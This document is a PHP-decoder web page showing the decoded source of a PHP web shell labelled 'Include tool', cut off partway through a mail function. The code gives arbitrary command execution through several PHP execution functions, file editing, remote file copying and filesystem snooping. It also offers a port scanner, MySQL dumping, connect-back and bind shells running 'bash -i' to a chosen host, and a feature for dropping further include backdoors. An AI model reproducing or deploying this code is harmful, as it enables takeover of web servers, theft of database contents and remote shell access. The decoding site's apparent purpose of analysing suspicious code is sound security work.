Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ###################################################################### # we decide..

Decoded Output download

<?php 
###################################################################### 
# we decide if we want syslogging 
closelog(); 
###################################################################### 
# define variables 
###################################################################### 
 
# error_reporting(E_ALL); 
error_reporting(0); 
 
# get globals even if register_globals is off 
import_globals(); 
 
$safe_mode = ini_get('safe_mode'); 
$register_globals = ini_get('register_globals'); 
$magic_quotes_gpc = ini_get('magic_quotes_gpc'); 
$txt['en']['on']="on"; 
$txt['en']['off']="off"; 
$txt['de']['on']="an"; 
$txt['de']['off']="aus"; 
$lang="en"; 
 
if($safe_mode == 1) $SM = $txt[$lang]['on']; 
else {  
	$SM = $txt[$lang]['off']; 
	# set_time_limit(9000); 
} 
if($register_globals == 1) $RG = $txt[$lang]['on']; 
else $RG = $txt[$lang]['off']; 
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on']; 
else $MQ = $txt[$lang]['off']; 
 
# navigatable functions 
$ArrFuncs = array( 
	"dropinc"	=> 0, 
	"filecopy"	=> 0, 
	"fileedit"	=> 0, 
	"showsource"	=> 0, 
	"snoop"		=> 0, 
	"cmdln"		=> 0, 
	"connectback"	=> 0, 
	"phpshell"	=> 0, 
	"servicecheck"	=> 0, 
	"mysqlaccess"	=> 0, 
	"mail"		=> 0, 
	"env"		=> 0, 
	"phpenv"	=> 0, 
	"phpinfo"	=> 0, 
	"dumpvars"	=> 0, 
	"debugscript"	=> 0, 
	"syslog"	=> 0 
); 
 
# init navigation 
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val; 
 
 
 
# set default values 
$ArrDefaults = array( 
	"filecopy_source" => "http://...", 
	"filecopy_dest" => getcwd(), 
	"cmdcall" => "", 
	"editfile" => getcwd(), 
	"editcontent" => "", 
	"chdir" => ".", 
	"vsource" => $SCRIPT_FILENAME, 
	"mail_from" => "[email protected]", 
	"mail_to" => "", 
	"mail_subject" => "",  
	"mail_attach_source"  => "http://....", 
	"mail_attach_appear"  => "filename...", 
	"mail_content_type"   => "image/png", 
	"mail_msg" => "", 
	"tcpports" => "21 22 23 25 80 110", 
	"timeout" => 5, 
	"miniinc_loc" => getcwd() . "/miniinc.php", 
	"incdbhost" => "localhost", 
	"cbhost" => $_SERVER['REMOTE_ADDR'], 
	"cbport" => 20202, 
	"cbtempdir" => "/tmp", 
	"cbcompiler" => "gcc", 
	"phpshellapp" => "export TERM=xterm; bash -i", 
	"phpshellhost" => "0.0.0.0", 
	"phpshellport" => "20202" 
); 
 
# init defaults 
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val; 
 
# define executable functions 
$Mstr = array( 
	0 => "No execute functions available!", 
	1 => "passthru()", 
	2 => "system()", 
	3 => "backticks", 
	4 => "proc_open()", 
	5 => "exec()" 
); 
 
# clean request to avoid uri monster 
$SREQ = ""; 
$reqdat = array(); 
$tmpCount=0; 
foreach($REQUESTS as $key => $val){ 
	if($tmpCount==0) $reqdat[] = $key."=".$val; 
	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val; 
	$tmpCount++; 
} 
$SREQ = implode("&", $reqdat); 
$tmpCount=0; 
if($SREQ=="") { 
	$tmp_req = array(); 
	$tmp_qry = explode("&", $QUERY_STRING); 
	foreach($tmp_qry as $key => $val) { 
		$tmp_val = explode("=", $val); 
		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; 
		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; 
		$tmpCount++; 
	} 
	$SREQ = implode("&", $tmp_req); 
} 
 
if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot']; 
 
# set some defaults to avaoid errors 
$is_file   = array(); 
$is_dir    = array(); 
$is_w_dir  = array(); 
$is_w_file = array(); 
$emeth=0; 
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/"; 
$chdir = str_replace("//", "/", $chdir); 
if(substr($chdir, -1) != "/") $chdir .= "/"; 
## 
# Setup wether to use PHP_SELF or SCRIPT_NAME 
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF; 
else $MyLoc = $SCRIPT_NAME; 
 
# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc; 
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc; 
 
# This is a list of internal inc.inc vars that do not get displayed  
# inside the dumpvars function (poss for a debug func later?) 
$DebugArr = array( 
	'ARHGFDGFGASDFG', 
	'safe_mode', 
	'register_globals', 
	'magic_quotes_gpc', 
	'txt', 
	'lang', 
	'SM', 
	'RG', 
	'MQ', 
	'ArrFuncs', 
	'val', 
	'key', 
	'env', 
	'phpenv', 
	'phpinfo', 
	'debugscript', 
	'filecopy', 
	'fileedit', 
	'showsource', 
	'snoop', 
	'mail', 
	'cmdln', 
	'syslog', 
	'servicecheck', 
	'dropinc', 
	'mysqlaccess', 
	'ArrDefaults', 
	'filecopy_source', 
	'filecopy_dest', 
	'cmdcall', 
	'editfile', 
	'editcontent', 
	'chdir', 
	'vsource', 
	'mail_from', 
	'mail_to', 
	'mail_subject', 
	'mail_attach_source', 
	'mail_attach_appear', 
	'mail_content_type', 
	'mail_msg', 
	'tcpports', 
	'timeout', 
	'miniinc_loc', 
	'incdbhost', 
	'Mstr', 
	'SREQ', 
	'reqdat', 
	'tmpCount', 
	'is_file', 
	'is_dir', 
	'is_w_dir', 
	'is_w_file', 
	'emeth', 
	'MyLoc', 
	'dumpvarsare', 
	'DebugArr', 
	'cbtempdir', 
	'cbcompiler', 
	'cbhost', 
	'cbport', 
	'phpshelltype', 
	'phpshellapp', 
	'phpshellhost', 
	'phpshellport' 
); 
 
 
# activate syslog entry 
if($syslog == 1) 
{ 
#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0); 
#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)"); 
} 
############################################################################### 
# 
# start include output  
# 
############################################################################### 
$strOutput = ""; 
$strOutput .= "<html><body bgcolor='#ffffff'> 
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'> 
<center> 
<h2>Include tool</h2> 
PHP Version: " . phpversion() . " |  
safe_mode: $SM | 
register_globals: $RG |  
magic_quotes_gpc: $MQ |  
syslogging: "; 
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on']; 
$strOutput .= " 
<br><br> 
</center> 
<font color='#000000'>"; 
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key);  
 
############################################################################### 
# test cmd shell environment 
############################################################################### 
if($env == 1) {  
	$strOutput .= " 
	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr> 
	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>"; 
	if($emeth==0) {  
		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>"; 
	} else { 
		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr> 
		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr> 
		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr> 
		</table>"; 
	} 
} 
 
############################################################################### 
# test php environment 
############################################################################### 
if($phpenv == 1) {  
	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr> 
		<tr><td colspan=2>posix infos</td><tr>"; 
		if(function_exists('posix_uname')) { 
			$posix_uname = posix_uname(); 
			while (list($info, $value) = each ($posix_uname)) { 
				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>"; 
			} 
		} else { 
			$strOutput .= "posix_uname not available"; 
		} 
		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>"; 
		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>"; 
		else $strOutput .= "posix_getuid not available"; 
		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>"; 
		else $strOutput .= "posix_geteuid not available"; 
		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>"; 
		else $strOutput .= "posix_getgid not available"; 
	$strOutput .= "</table>"; 
} 
 
 
############################################################################### 
# dump variables 
############################################################################### 
if($dumpvars == 1) { 
	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr> 
	<tr><td>" . dd("GLOBALS") . "</td></tr> 
	</table>"; 
} 
############################################################################### 
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!! 
############################################################################### 
if($debugscript == 1) { ?> 
	<table border=1><tr><td><h3>debug script</h3></td></tr> 
	<tr><td> 
	<? ddb("DebugArr"); ?> 
	</td></tr> 
	</table> 
<? } 
############################################################################### 
# copy file 
############################################################################### 
if($filecopy == 1) {  
	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr> 
	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr> 
	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr> 
	</form> 
	</table>"; 
}  
############################################################################### 
# edit file 
############################################################################### 
if($fileedit == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr> 
	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr> 
	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>";  
	if($edit==1 | $editfile!=$ArrDefaults['editfile']) 
		$strOutput .= show_file($editfile); 
	$strOutput .= "</textarea></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>"; 
	if($edit==1 | $editfile!=$ArrDefaults['editfile']) 
		$strOutput .= edit_file($editcontent,$editfile,$edit); 
 	$strOutput .= "</td></tr> 
	</table> 
	</form>"; 
} 
############################################################################### 
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!! 
############################################################################### 
if($cmdln == 1) { 
	$emeth = test_cmd_shell(); 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr> 
	<tr><td colspan=2>"; 
	if($emeth < 3) { 
		$strOutput .= "The output of this command will be somewhere on the page!"; 
		Mexec($cmdcall, $emeth); 
	} else { 
		$strOutput .= Mexec($cmdcall, $emeth); 
	} 
	$strOutput .= "</td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# sending mime mail 
############################################################################### 
if($mail == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr> 
	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr> 
	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr> 
	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr> 
	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr> 
	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr> 
	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr> 
	</form> 
	</table>"; 
} 
 
############################################################################### 
# drop mini inc handling 
############################################################################### 
if($dropinc == 1) {  
	if($loc!="") $miniinc_loc = $loc; 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr> 
	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2><pre>"; 
	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc); 
	$strOutput .= "</pre></td></tr> 
	</form> 
	</table>"; 
}  
############################################################################### 
# connect C back shell handling 
############################################################################### 
if($connectback == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr> 
	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr> 
	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr> 
	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr> 
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>"; 
	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport); 
	$strOutput .= "</td></tr></form></table>"; 
} 
 
############################################################################### 
# PHP shell handling 
############################################################################### 
if($phpshell == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr> 
	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr> 
	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr> 
	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr> 
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>"; 
	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost); 
	$strOutput .= "</td></tr></form></table>"; 
} 
 
 
############################################################################### 
# snooping 
############################################################################### 
if($snoop == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr> 
	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# show highlited source 
############################################################################### 
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# service check 
############################################################################### 
if($servicecheck == 1) { 
if($servhost!="") $host = $servhost; 
else $host = "localhost"; 
 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr> 
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> 
	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr> 
	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr> 
	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr> 
	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr --> 
	<tr><td></td><td><input type=submit></td></tr> 
	<tr><td colspan=2><pre>"; 
 
	$hosts = explode(" ", $host); 
	$port = explode(" ",$tcpports); 
	$values = count($port); 
	$numhosts = count($hosts); 
	if($values == 1 && $port[0] != "") $strOutput .= "
Checking 1 port..
"; 
	else if($values > 1) $strOutput .= "Checking $values ports..
"; 
	else $strOutput .= "No ports specified!!
"; 
	if($numhosts > 1) $strOutput .= "On $numhosts hosts..
"; 
	else if($numhosts == 1) $strOutput .= "On 1 host..
"; 
	else $strOutput .= "No hosts specified!!
"; 
	if($numhosts >= 1) { 
		for($hcount=0; $hcount < $numhosts; $hcount++) { 
			$tmphost = $hosts[$hcount]; 
			$strOutput .= "
Testing $tmphost..
"; 
			if(($values == 1 && $port[0] != "") | $values > 1) { 
				for ($cont=0; $cont < $values; $cont++) { 
					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout); 
					$service = getservbyport($port[$cont],"tcp"); 
					@$get = fgets($sock[$cont]); 
					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get 
"; 
					flush(); 
				} 
			} 
		} 
	} 
	$strOutput .= "</pre></td></tr> 
	</form> 
	</table>"; 
} 
############################################################################### 
# show phpinfo 
############################################################################### 
if($phpinfo == 1){  
	phpinfo(); 
} 
###################################################################### 
# db stuff 
###################################################################### 
if($mysqlaccess == 1) { 
	$strOutput .= "<table border=1> 
	<form method='post' target='_parent' action='$MyLoc?$SREQ&'> 
	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr> 
	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr> 
	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr> 
	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr> 
	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr> 
	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr> 
	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr> 
	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr --> 
	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr> 
	</table>"; 
} 
 
if($incdbhost!="" && $incdbuser!="") { 
	if($incdbvar!="") $dbh = $incdbhost; 
	else $dbH = $incdbhost; 
	$dbu = $incdbuser; 
	$dbp = $incdbpass; 
	if($incdbsql!="") $dbs = $incdbsql; 
	if($incdbname!="") $dbn = $incdbname; 
	if($incdbtable!="") $dbt = $incdbtable; 
	if($incdbfile!="") $dumpfile = $incdbfile; 
} 
 
if(isset($dbh)) { 
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>"; 
	eval("\$Gdbhost = \"\$$dbh\";"); 
	eval("\$Gdbuser = \"\$$dbu\";"); 
	eval("\$Gdbpass = \"\$$dbp\";"); 
	eval("\$Gdbname = \"\$$dbn\";"); 
	$strOutput .= "<tr><td>"; 
	if($dbn=="") { 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . 
		"</td></tr><tr><td>" . 
		display_dbs($Gdbhost, $Gdbuser, $Gdbpass); 
	} else if(isset($dbs)) { 
		$Gdbsql = $dbs; 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql .  
		"</td></tr><tr><td>"; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile); 
		} else { 
			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql); 
		} 
	} else if(isset($dbt)) { 
		$Gdbtabl = $dbt; 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl; 
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; 
		$strOutput .= "</td></tr><tr><td>"; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		 
		} else { 
			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); 
		} 
	} else { 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname . 
		"</td></tr><tr><td>" . 
		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
if(isset($dbH)) { 
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>"; 
	if($dbn=="") { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp. 
		"</td></tr><tr><td>". 
		display_dbs($dbH, $dbu, $dbp); 
	} else if(isset($dbs)) { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs. 
		"</td></tr><tr><td>"; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile); 
		} else { 
			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs); 
		} 
	} else if(isset($dbt)) { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt; 
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; 
		$strOutput .= "</td></tr><tr><td> "; 
		if(isset($dumpfile)) { 
			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		 
		} else { 
			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt); 
		} 
	} else { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn . 
		"</td></tr><tr><td>" . 
		display_tables($dbH, $dbu, $dbp, $dbn); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
if(isset($Odbh)) { 
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>"; 
	eval("\$Gdbhost = \"\$$Odbh\";"); 
	eval("\$Gdbuser = \"\$$dbu\";"); 
	eval("\$Gdbpass = \"\$$dbp\";"); 
	eval("\$Gdbname = \"\$$dbn\";"); 
	$strOutput .= "<tr><td>"; 
	if(isset($dbt)) { 
		$Gdbtabl = $dbt; 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl . 
		"</td></tr><tr><td>" . 
		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); 
	} else { 
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . 
		"</td></tr><tr><td> " . 
		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
if(isset($OdbH)) { 
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>"; 
	if(isset($dbt)) { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt . 
		"</td></tr><tr><td> " . 
		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt); 
	} else { 
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp . 
		"</td></tr><tr><td> " . 
		Odisplay_tables($OdbH, $dbu, $dbp); 
	} 
	$strOutput .= "</pre></td></tr></table><br/>"; 
} 
 
 
$strOutput .= "</font></td></tr></table>"; 
$strOutputB64 = chunk_split(base64_encode($strOutput)); 
echo "</div></div></div></div></div></div></div></div></div></div>
"; 
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">'; 
 
###################################################################### 
# 
# functions 
# 
###################################################################### 
# make globals avail 
function import_globals()   
{ 
	global $HTTP_SERVER_VARS; 
	global $REMOTE_ADDR;   
	global $PHP_SELF; 
	global $REQUESTS; 
	global $SCRIPT_FILENAME; 
	global $QUERY_STRING; 
	global $SCRIPT_URI; 
	global $SERVER_NAME; 
	$_igr = ini_get('register_globals'); 
	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC'); 
	if (phpversion() <= '4.1.0') { 
		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS);  
	} else { 
		$REQUESTS = $_REQUEST; 
	} 
	if($_SERVER['PHP_SELF']=="") { 
		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME']; 
		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI']; 
		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR']; 
		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING']; 
		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF']; 
		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME']; 
	} else { 
		$SERVER_NAME     = $_SERVER['SERVER_NAME']; 
		$SCRIPT_URI      = $_SERVER['SCRIPT_URI']; 
		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR']; 
		$QUERY_STRING    = $_SERVER['QUERY_STRING']; 
		$PHP_SELF        = $_SERVER['PHP_SELF']; 
		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME']; 
	} 
} 
 
function dd($v) { 
	global $DebugArr; 
	$rv = "<blockquote>
"; 
	$q="while(list(\$key,\$val) = each(\$$v)) {". 
	' if(array_search($key, $DebugArr)) {'. 
	' } else if((is_array($val)) && ($key!="GLOBALS")) {'. 
	'  echo "<b>$key</b>>><br/>";'. 
	'  @dd($v."[".$key."]");'. 
	' } else if($key=="GLOBALS") {'. 
	' } else echo "<b>$key</b>=>$val<br/>";'. 
	'};'; 
	eval($q); 
	echo "</blockquote>
"; 
} 
 
function ddb($v) { 
	echo "<blockquote>
"; 
	$q="while(list(\$key,\$val) = each(\$$v)) {". 
	' if((is_array($val)) && ($key!="GLOBALS")) {'. 
	'  echo "<b>$key</b>>><br/>";'. 
	'  @dd($v."[".$key."]");'. 
	' } else if($key=="GLOBALS") {'. 
	' } else echo "<b>$key</b>=>$val<br/>";'. 
	'};'; 
	eval($q); 
	echo "</blockquote>
"; 
} 
 
###################################################################### 
# cmd shell functions 
###################################################################### 
# test what cmd is working 
function test_cmd_shell(){ 
	if(strlen(Mexec("pwd", 5))>11)     $var = 5; 
	elseif(strlen(Mexec("pwd", 4))>11) $var = 4; 
	elseif(strlen(Mexec("pwd", 3))>11) $var = 3; 
	elseif(strlen(Mexec("pwd", 2))>0) $var = 2; 
	elseif(strlen(Mexec("pwd", 1))>0) $var = 1; 
	else $var = 0; 
	return $var; 
} 
# function for executing cmds 
function Mexec($Mcmd, $type) { 
	if($Mcmd != ""){ 
		$dspec = array( 
			0 => array("pipe", "r"), 
			1 => array("pipe", "w"), 
			2 => array("pipe", "r") 
		); 
		$output = ""; 
		switch($type) { 
			case 5: 
				$output .= "<pre>"; 
				$lastline = exec($Mcmd, $arrOutput); 
				foreach($arrOutput as $val) { 
					$output .= $val . "
"; 
				} 
				$output .= "</pre>"; 
				break; 
			case 4: 
				$proc = proc_open($Mcmd, $dspec, $pipes); 
				if (is_resource($proc)) { 
					$output .= "<pre>"; 
					fclose($pipes[0]); 
					while(!feof($pipes[1])) { 
						$tmp = fgets($pipes[1], 1024); 
						$output .= $tmp; 
					} 
					$output .= "</pre>"; 
				} 
				break; 
			case 3; 
				$output .= "<pre>"; 
				$output .= `$Mcmd`; 
				$output .= "</pre>"; 
				break; 
			case 2; 
				print "<pre>
"; 
				$output = system($Mcmd); 
				print "</pre>
"; 
				break; 
			case 1; 
				print "<pre>
"; 
				$output = passthru($Mcmd); 
				print "</pre>
"; 
				break; 
			case 0; 
			default; 
				$output = "There are no execute functions available!"; 
				break; 
		} 
		return $output; 
	}	 
} 
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) { 
	$msgerror = ""; 
	if($msg == "") $msgerror = "please enter a message"; 
	elseif($subject == "") $msgerror = "please enter a subject"; 
	else { 
		$stlf = md5(uniqid(time()));  
		$attach = ""; 
		$fp = fopen($attach_source, "rb");  
		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); }  
		$header = "From: $from
";  
		$header .= "MIME-Version: 1.0
";  
		$header .= "Content-Type: multipart/mixed; boundary=$stlf

";  
		$header .= "This is a multi-part message in MIME format
";  
		$header .= "--$stlf
";  
		$header .= "Content-Type: text/plain
";  
